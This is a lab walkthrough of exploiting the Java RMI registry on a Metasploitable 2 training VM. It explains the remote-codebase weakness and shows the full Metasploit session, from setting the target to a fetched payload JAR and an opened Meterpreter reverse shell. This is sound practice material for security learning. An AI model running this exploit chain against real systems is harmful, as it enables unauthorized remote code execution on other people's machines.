The Nmap scan of Metasploitable 2 revealed:
PORT     STATE SERVICE     VERSION
1099/tcp open  rmiregistry GNU Classpath grmiregistry
From Wikipedia:
The Java Remote Method Invocation (Java RMI) is a Java API that performs the object-oriented equivalent of remote procedure calls (RPC), with support for direct transfer of serialized Java objects and distributed garbage collection.
OK, let's have a look in Metasploit. The exploit/multi/misc/java_rmi_server module abuses the RMI registry's default willingness to load classes from a remote codebase: it starts an HTTP server (SRVHOST/SRVPORT) that serves a JAR containing the payload, sends the registry a request whose codebase annotation points at that URL, and the registry fetches and executes the class. That is why the module needs both an HTTP listener and a reverse handler. Java 7u21 and later ship with java.rmi.server.useCodebaseOnly=true by default, which disables this remote class loading, so a registry being present does not by itself mean it is exploitable.
msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    1099             yes       The target port
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)

msf exploit(java_rmi_server) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(java_rmi_server) > exploit

[*] Started reverse handler on 192.168.1.78:4444
[*] Using URL: http://0.0.0.0:8080/02Bwa0tNBOFx
[*] Local IP: http://192.168.1.70:8080/02Bwa0tNBOFx
[*] Connected and sending request for http://192.168.1.78:8080/02Bwa0tNBOFx/apQlsfJd.jar
[*] 192.168.1.103 java_rmi_server - Replied to request for payload JAR
[*] Sending stage (30355 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.78:4444 -> 192.168.1.103:54392) at 2013-11-13 09:19:06 +0000
[+] Target 192.168.1.103:1099 may be exploitable...
[*] Server stopped.
meterpreter >
Below is a video demonstrating the above exploit.